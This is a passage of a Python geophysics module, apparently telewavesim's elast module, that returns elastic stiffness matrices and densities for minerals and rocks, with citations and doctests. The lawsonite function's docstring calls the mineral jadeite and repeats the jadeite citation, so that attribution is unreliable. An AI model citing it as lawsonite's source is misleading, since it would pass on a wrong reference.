C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 52.8; C[4,5] = 0.
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 51.2
return C, rho
def harzburgite():
"""
Elastic constants of harzburgite rock (GPa) from
Covey-Crump et al. (2003), in Voigt notation
- Abbreviation: ``'HB'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (3200 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.harzburgite()[0]
array([[226.5 , 75.34, 74.73, -0.27, -2. , 1.85],
[ 75.34, 242.8 , 73.68, -3.6 , -1.91, 4.14],
[ 74.73, 73.68, 230. , -4.36, -4.27, -0.27],
[ -0.27, -3.6 , -4.36, 80.75, 1.81, -2.19],
[ -2. , -1.91, -4.27, 1.81, 76.94, -1.88],
[ 1.85, 4.14, -0.27, -2.19, -1.88, 79.15]])
>>> elast.harzburgite()[1]
3200.0
"""
rho = 3200.
C = np.zeros((6,6), dtype=float)
C[0,0] = 226.5; C[0,1] = 75.34; C[0,2] = 74.73; C[0,3] = -0.27; C[0,4] = -2.00; C[0,5] = 1.85
C[1,0] = C[0,1]; C[1,1] = 242.8; C[1,2] = 73.68; C[1,3] = -3.6; C[1,4] = -1.91; C[1,5] = 4.14
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 230.; C[2,3] = -4.36; C[2,4] = -4.27; C[2,5] = -0.27
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 80.75; C[3,4] = 1.81; C[3,5] = -2.19
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 76.94; C[4,5] = -1.88
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 79.15
return C, rho
def hornblende():
"""
Elastic constants of hornblende mineral (GPa) from
Aleksandrov and Ryzhova (1986), in Voigt notation
- Abbreviation: ``'hbl'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (3200 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.hornblende()[0]
array([[116. , 49.9, 61.4, 0. , 4.3, 0. ],
[ 49.9, 159.7, 65.5, 0. , -2.5, 0. ],
[ 61.4, 65.5, 191.6, 0. , 10. , 0. ],
[ 0. , 0. , 0. , 57.4, 0. , -6.2],
[ 4.3, -2.5, 10. , 0. , 31.8, 0. ],
[ 0. , 0. , 0. , -6.2, 0. , 36.8]])
>>> elast.hornblende()[1]
3200.0
"""
rho = 3200.
C = np.zeros((6,6), dtype=float)
C[0,0] = 116.; C[0,1] = 49.9; C[0,2] = 61.4; C[0,3] = 0.; C[0,4] = 4.3; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 159.7; C[1,2] = 65.5; C[1,3] = 0.; C[1,4] = -2.5; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 191.6; C[2,3] = 0.; C[2,4] = 10.; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 57.4; C[3,4] = 0.; C[3,5] = -6.2
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 31.8; C[4,5] = 0.
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 36.8
return C, rho
def jadeite():
"""
Elastic constants of jadeite mineral (GPa) from
Kandelin and Weiner (1988), in Voigt notation
- Abbreviation: ``'jade'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (3330 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.jadeite()[0]
array([[274., 94., 71., 0., 4., 0.],
[ 94., 253., 82., 0., 14., 0.],
[ 71., 82., 282., 0., 28., 0.],
[ 0., 0., 0., 88., 0., 13.],
[ 4., 14., 28., 0., 65., 0.],
[ 0., 0., 0., 13., 0., 94.]])
>>> elast.jadeite()[1]
3330.0
"""
rho = 3330.
C = np.zeros((6,6), dtype=float)
C[0,0] = 274.; C[0,1] = 94.; C[0,2] = 71.; C[0,3] = 0.; C[0,4] = 4.; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 253.; C[1,2] = 82.; C[1,3] = 0.; C[1,4] = 14.; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 282.; C[2,3] = 0.; C[2,4] = 28.; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 88.; C[3,4] = 0.; C[3,5] = 13.
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 65.; C[4,5] = 0.
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 94.
return C, rho
def lawsonite():
"""
Elastic constants of jadeite mineral (GPa) from
Kandelin and Weiner (1988), in Voigt notation
- Abbreviation: ``'lws'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (3090 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.lawsonite()[0]
array([[214., 69., 82., 0., 0., 0.],
[ 69., 226., 65., 0., 0., 0.],
[ 82., 65., 259., 0., 0., 0.],
[ 0., 0., 0., 60., 0., 0.],
[ 0., 0., 0., 0., 65., 0.],
[ 0., 0., 0., 0., 0., 17.]])
>>> elast.lawsonite()[1]
3090.0
"""
rho = 3090.
C = np.zeros((6,6), dtype=float)
C[0,0] = 214.; C[0,1] = 69.; C[0,2] = 82.; C[0,3] = 0.; C[0,4] = 0.; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 226.; C[1,2] = 65.; C[1,3] = 0.; C[1,4] = 0.; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 259.; C[2,3] = 0.; C[2,4] = 0.; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 60.; C[3,4] = 0.; C[3,5] = 0.
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 65.; C[4,5] = 0.
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 17.
return C, rho
def lherzolite():
"""
Elastic constants of lherzolite rock (GPa) from
Peselnick et al. (1974), in Voigt notation
- Abbreviation: ``'LHZ'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (3270 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.lherzolite()[0]
array([[ 1.8740e+02, 6.3710e+01, 6.3870e+01, 7.8000e-01, 2.0200e+00,
-3.2000e+00],
[ 6.3710e+01, 2.1125e+02, 6.4500e+01, -3.0700e+00, 8.7000e-01,
-5.7800e+00],
[ 6.3870e+01, 6.4500e+01, 1.9000e+02, 3.8000e-01, 2.3800e+00,
-1.2000e-01],
[ 7.8000e-01, -3.0700e+00, 3.8000e-01, 6.7900e+01, -2.1200e+00,
1.6000e+00],
[ 2.0200e+00, 8.7000e-01, 2.3800e+00, -2.1200e+00, 6.3120e+01,
-5.5000e-01],
[-3.2000e+00, -5.7800e+00, -1.2000e-01, 1.6000e+00, -5.5000e-01,
6.6830e+01]])
>>> elast.lherzolite()[1]
3270.0
"""
rho = 3270.
C = np.zeros((6,6), dtype=float)
C[0,0] = 187.4; C[0,1] = 63.71; C[0,2] = 63.87; C[0,3] = 0.78; C[0,4] = 2.02; C[0,5] = -3.2
C[1,0] = C[0,1]; C[1,1] = 211.25; C[1,2] = 64.5; C[1,3] = -3.07; C[1,4] = 0.87; C[1,5] = -5.78
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 190.; C[2,3] = 0.38; C[2,4] = 2.38; C[2,5] = -0.12
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 67.9; C[3,4] = -2.12; C[3,5] = 1.6
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 63.12; C[4,5] = -0.55
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 66.83
return C, rho
def lizardite_atom():
"""
Elastic constants of lizardite mineral (GPa) from
Auzende et al., Phys. Chem. Min. 2006 from atomistic calculations.
- Abbreviation: ``None``: Not currently used.
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (2515 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.lizardite_atom()[0]
array([[ 2.29080e+02, 8.90440e+01, 1.35580e+01, -1.00000e-04,
4.60250e+00, 1.00000e-04],
[ 8.90440e+01, 2.29080e+02, 1.35570e+01, -1.00000e-04,
-4.60160e+00, 1.00000e-04],
[ 1.35580e+01, 1.35570e+01, 4.58380e+01, -1.00000e-04,
1.50000e-03, 1.00000e-04],
[-1.00000e-04, -1.00000e-04, -1.00000e-04, 1.27650e+01,
-1.00000e-04, -4.45980e+00],
[ 4.60250e+00, -4.60160e+00, 1.50000e-03, -1.00000e-04,
1.27740e+01, 1.00000e-04],
[ 1.00000e-04, 1.00000e-04, 1.00000e-04, -4.45980e+00,
1.00000e-04, 7.00166e+01]])
>>> elast.lizardite_atom()[1]
2515.5
"""
rho = 2515.5
C = np.zeros((6,6), dtype=float)
C[0,0] = 229.08; C[0,1] = 89.044; C[0,2] = 13.558; C[0,3] = -0.0001; C[0,4] = 4.6025; C[0,5] = 0.0001
C[1,0] = C[0,1]; C[1,1] = 229.08; C[1,2] = 13.557; C[1,3] = -0.0001; C[1,4] = -4.6016; C[1,5] = 0.0001
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 45.838; C[2,3] = -0.0001; C[2,4] = 0.0015; C[2,5] = 0.0001
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 12.765; C[3,4] = -0.0001; C[3,5] = -4.4598
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 12.774; C[4,5] = 0.0001
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 70.0166
return C, rho
def lizardite():
"""
Elastic constants of lizardite mineral (GPa) from
Reynard, GRL, 2007 from Density Functional Theory.
- Abbreviation: ``'lz'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (2610 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.lizardite()[0]
array([[245. , 50. , 31. , 0. , 0. , 0. ],
[ 50. , 245. , 31. , 0. , 0. , 0. ],
[ 31. , 31. , 23. , 0. , 0. , 0. ],
[ 0. , 0. , 0. , 11.6, 0. , 0. ],
[ 0. , 0. , 0. , 0. , 11.6, 0. ],
[ 0. , 0. , 0. , 0. , 0. , 97.5]])
>>> elast.lizardite()[1]
2610.0
"""
rho = 2610.
C = np.zeros((6,6), dtype=float)
C[0,0] = 245.; C[0,1] = 50.; C[0,2] = 31.; C[0,3] = 0.; C[0,4] = 0.; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 245.; C[1,2] = 31.; C[1,3] = 0.; C[1,4] = 0.; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 23.; C[2,3] = 0.; C[2,4] = 0.; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 11.6; C[3,4] = 0.; C[3,5] = 0.
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 11.6; C[4,5] = 0.
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 97.5
return C, rho
def muscovite():
"""
Elastic constants of muscovite mineral (GPa) from
Vaughan and Guggenheim (1986), in Voigt notation
- Abbreviation: ``'ms'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (2834 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.muscovite()[0]
array([[181. , 48.8, 25.6, 0. , -14.2, 0. ],
[ 48.8, 178.4, 21.2, 0. , 1.1, 0. ],
[ 25.6, 21.2, 58.6, 0. , 1. , 0. ],
[ 0. , 0. , 0. , 16.5, 0. , -5.2],
[-14.2, 1.1, 1. , 0. , 19.5, 0. ],
[ 0. , 0. , 0. , -5.2, 0. , 72. ]])
>>> elast.muscovite()[1]
2834.0
"""
rho = 2834.
C = np.zeros((6,6), dtype=float)
C[0,0] = 181.; C[0,1] = 48.8; C[0,2] = 25.6; C[0,3] = 0.; C[0,4] = -14.2; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 178.4; C[1,2] = 21.2; C[1,3] = 0.; C[1,4] = 1.1; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 58.6; C[2,3] = 0.; C[2,4] = 1.; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 16.5; C[3,4] = 0.; C[3,5] = -5.2
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 19.5; C[4,5] = 0.
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 72.
return C, rho
def olivine():
"""
Elastic constants of olivine mineral (GPa) from
Abrahamson et al. (1997), in Voigt notation
- Abbreviation: ``'ol'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (3355 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.olivine()[0]
array([[320.5 , 68.15, 71.6 , 0. , 0. , 0. ],
[ 68.15, 196.5 , 76.8 , 0. , 0. , 0. ],
[ 71.6 , 76.8 , 233.5 , 0. , 0. , 0. ],
[ 0. , 0. , 0. , 64. , 0. , 0. ],
[ 0. , 0. , 0. , 0. , 77. , 0. ],
[ 0. , 0. , 0. , 0. , 0. , 78.7 ]])
>>> elast.olivine()[1]
3355.0
"""
rho = 3355.
C = np.zeros((6,6), dtype=float)
C[0,0] = 320.5; C[0,1] = 68.15; C[0,2] = 71.6; C[0,3] = 0.; C[0,4] = 0.; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 196.5; C[1,2] = 76.8; C[1,3] = 0.; C[1,4] = 0.; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 233.5; C[2,3] = 0.; C[2,4] = 0.; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 64.; C[3,4] = 0.; C[3,5] = 0.
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 77.; C[4,5] = 0.
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 78.7
return C, rho
def orthopyroxene():
"""
Elastic constants of orthopyroxene mineral (GPa) from
Chai et al. (1977), in Voigt notation
- Abbreviation: ``'opx'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (3304 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.orthopyroxene()[0]
array([[236.9, 79.6, 63.2, 0. , 0. , 0. ],
[ 79.6, 180.5, 56.8, 0. , 0. , 0. ],
[ 63.2, 56.8, 230.4, 0. , 0. , 0. ],
[ 0. , 0. , 0. , 84.3, 0. , 0. ],
[ 0. , 0. , 0. , 0. , 79.4, 0. ],
[ 0. , 0. , 0. , 0. , 0. , 80.1]])
>>> elast.orthopyroxene()[1]
3304.0
"""
rho = 3304.
C = np.zeros((6,6), dtype=float)
C[0,0] = 236.9; C[0,1] = 79.6; C[0,2] = 63.2; C[0,3] = 0.; C[0,4] = 0.; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 180.5; C[1,2] = 56.8; C[1,3] = 0.; C[1,4] = 0.; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 230.4; C[2,3] = 0.; C[2,4] = 0.; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 84.3; C[3,4] = 0.; C[3,5] = 0.
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 79.4; C[4,5] = 0.
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 80.1
return C, rho
def plagioclase_64():
"""
Elastic constants of plagioclase mineral (GPa) from
Ryzhova (1964), in Voigt notation
- Abbreviation: ``None``: Not currently used.
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (2700 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.plagioclase_64()[0]
array([[ 81.8, 39.3, 40.7, 0. , -9. , 0. ],
[ 39.3, 145. , 34.1, 0. , -7.9, 0. ],
[ 40.7, 34.1, 133. , 0. , -18.5, 0. ],
[ 0. , 0. , 0. , 17.7, 0. , -0.8],
[ -9. , -7.9, -18.5, 0. , 31.2, 0. ],
[ 0. , 0. , 0. , -0.8, 0. , 33.3]])
>>> elast.plagioclase_64()[1]
2700.0
"""
rho = 2700.
C = np.zeros((6,6), dtype=float)
C[0,0] = 81.8; C[0,1] = 39.3; C[0,2] = 40.7; C[0,3] = 0.; C[0,4] = -9.; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 145.; C[1,2] = 34.1; C[1,3] = 0.; C[1,4] = -7.9; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 133.; C[2,3] = 0.; C[2,4] = -18.5; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 17.7; C[3,4] = 0.; C[3,5] = -0.8
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 31.2; C[4,5] = 0.
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 33.3
return C, rho
def plagioclase_06():
"""
Elastic constants of plagioclase mineral (GPa) from
Brown et al. (2006), in Voigt notation
- Abbreviation: ``'plag'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (2700 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.plagioclase_06()[0]
array([[ 69.9 , 33.24 , 31.56 , 5.28 , -2.46 , -0.72 ],
[ 33.24 , 183.28 , 7.53 , 5.31 , -7.6 , -0.423],
[ 31.56 , 7.53 , 175.65 , -17.48 , 5.86 , -11.29 ],
[ 5.28 , 5.31 , -17.48 , 26.93 , -3.94 , -6.56 ],
[ -2.46 , -7.6 , 5.86 , -3.94 , 26.91 , 0.98 ],
[ -0.72 , -0.423, -11.29 , -6.56 , 0.98 , 33.39 ]])
>>> elast.plagioclase_06()[1]
2700.0
"""
rho = 2700.
C = np.zeros((6,6), dtype=float)
C[0,0] = 69.9; C[0,1] = 33.24; C[0,2] = 31.56; C[0,3] = 5.28; C[0,4] = -2.46; C[0,5] = -0.72
C[1,0] = C[0,1]; C[1,1] = 183.28; C[1,2] = 7.53; C[1,3] = 5.31; C[1,4] = -7.6; C[1,5] = -0.423
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 175.65; C[2,3] = -17.48; C[2,4] = 5.86; C[2,5] = -11.29
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 26.93; C[3,4] = -3.94; C[3,5] = -6.56
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 26.91; C[4,5] = 0.98
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 33.39
return C, rho
def quartz():
"""
Elastic constants of quartz mineral (GPa) from
Lakshanov et al. (2007), in Voigt notation
- Abbreviation: ``'qtz'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (2649 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.quartz()[0]
array([[ 86.9, 7.6, 12. , 17.8, 0. , 0. ],
[ 7.6, 86.9, 12. , -17.8, 0. , 0. ],
[ 12. , 12. , 106.4, 0. , 0. , 0. ],
[ 17.8, -17.8, 0. , 59.5, 0. , 0. ],
[ 0. , 0. , 0. , 0. , 59.5, -17.8],
[ 0. , 0. , 0. , 0. , -17.8, 39.6]])
>>> elast.quartz()[1]
2649.0
"""
rho = 2649.
C = np.zeros((6,6), dtype=float)
C[0,0] = 86.9; C[0,1] = 7.6; C[0,2] = 12.; C[0,3] = 17.8; C[0,4] = 0.; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 86.9; C[1,2] = 12.; C[1,3] = -17.8; C[1,4] = 0.; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 106.4; C[2,3] = 0.; C[2,4] = 0.; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 59.5; C[3,4] = 0.; C[3,5] = 0.
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 59.5; C[4,5] = -17.8
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 39.6
return C, rho
def serpentinite_37():
"""
Elastic constants of serpentinite rock sample HPS-M (GPa) from
Watanabe et al., 2011, in Voigt notation.
- Mineralogy: ``Ol`` (57.7%), ``Atg`` (36.9%), ``Trm`` (4.5%), ``Mgt`` (1.1%)
- Abbreviation: ``'SP_37'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (3000 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.serpentinite_37()[0]
array([[ 2.0552e+02, 6.6360e+01, 6.2290e+01, -1.0000e-01, -1.4800e+00,
3.8600e+00],
[ 6.6360e+01, 1.9579e+02, 6.2530e+01, -3.7000e-01, 2.0000e-01,
1.5400e+00],
[ 6.2290e+01, 6.2530e+01, 1.9330e+02, -1.7800e+00, -2.4000e-01,
8.3000e-01],
[-1.0000e-01, -3.7000e-01, -1.7800e+00, 6.6170e+01, 1.4700e+00,
-5.7000e-01],
[-1.4800e+00, 2.0000e-01, -2.4000e-01, 1.4700e+00, 6.4700e+01,
-8.4000e-01],
[ 3.8600e+00, 1.5400e+00, 8.3000e-01, -5.7000e-01, -8.4000e-01,
6.7830e+01]])
>>> elast.serpentinite_37()[1]
3000.0
"""
rho = 3000.
C = np.zeros((6,6), dtype=float)
C[0,0] = 205.52; C[0,1] = 66.36; C[0,2] = 62.29; C[0,3] = -0.1; C[0,4] = -1.48; C[0,5] = 3.86
C[1,0] = C[0,1]; C[1,1] = 195.79; C[1,2] = 62.53; C[1,3] = -0.37; C[1,4] = 0.2; C[1,5] = 1.54
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 193.30; C[2,3] = -1.78; C[2,4] = -0.24; C[2,5] = 0.83
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 66.17; C[3,4] = 1.47; C[3,5] = -0.57
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 64.70; C[4,5] = -0.84
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 67.83
return C, rho
def serpentinite_80():
"""
Elastic constants of serpentinite rock sample HKB-B (GPa) from
Watanabe et al., 2011, in Voigt notation
- Mineralogy: ``Ol`` (12.0%), ``Atg`` (80.2%), ``Mgt`` (7.8%)
- Abbreviation: ``'SP_80'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (2800 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.serpentinite_80()[0]
array([[ 1.9225e+02, 4.9350e+01, 4.1700e+01, -4.5500e+00, 8.0400e+00,
9.7800e+00],
[ 4.9350e+01, 1.5690e+02, 4.2360e+01, -6.9100e+00, 7.1000e-01,
1.8400e+00],
[ 4.1700e+01, 4.2360e+01, 1.4162e+02, -4.2800e+00, 1.1100e+00,
1.9000e-01],
[-4.5500e+00, -6.9100e+00, -4.2800e+00, 5.3480e+01, 1.0000e-02,
-6.0000e-02],
[ 8.0400e+00, 7.1000e-01, 1.1100e+00, 1.0000e-02, 5.1910e+01,
-3.7200e+00],
[ 9.7800e+00, 1.8400e+00, 1.9000e-01, -6.0000e-02, -3.7200e+00,
5.9130e+01]])
>>> elast.serpentinite_80()[1]
2800.0
"""
rho = 2800.
C = np.zeros((6,6), dtype=float)
C[0,0] = 192.25; C[0,1] = 49.35; C[0,2] = 41.7; C[0,3] = -4.55; C[0,4] = 8.04; C[0,5] = 9.78
C[1,0] = C[0,1]; C[1,1] = 156.9; C[1,2] = 42.36; C[1,3] = -6.91; C[1,4] = 0.71; C[1,5] = 1.84
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 141.62; C[2,3] = -4.28; C[2,4] = 1.11; C[2,5] = 0.19
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 53.48; C[3,4] = 0.01; C[3,5] = -0.06
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 51.91; C[4,5] = -3.72
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 59.13
return C, rho
def zoisite():
"""
Elastic constants of zoisite mineral (GPa) from
Mao et al. (2007), in Voigt notation
- Abbreviation: ``'zo'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (3343 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.zoisite()[0]
array([[279.8, 94.7, 88.7, 0. , 0. , 0. ],
[ 94.7, 249.2, 27.5, 0. , 0. , 0. ],
[ 88.7, 27.5, 209.4, 0. , 0. , 0. ],
[ 0. , 0. , 0. , 51.8, 0. , 0. ],
[ 0. , 0. , 0. , 0. , 81.4, 0. ],
[ 0. , 0. , 0. , 0. , 0. , 66.3]])
>>> elast.zoisite()[1]
3343.0
"""
rho = 3343.
C = np.zeros((6,6), dtype=float)
C[0,0] = 279.8; C[0,1] = 94.7; C[0,2] = 88.7; C[0,3] = 0.; C[0,4] = 0.; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 249.2; C[1,2] = 27.5; C[1,3] = 0.; C[1,4] = 0.; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 209.4; C[2,3] = 0.; C[2,4] = 0.; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 51.8; C[3,4] = 0.; C[3,5] = 0.
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 81.4; C[4,5] = 0.
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 66.3
return C, rho
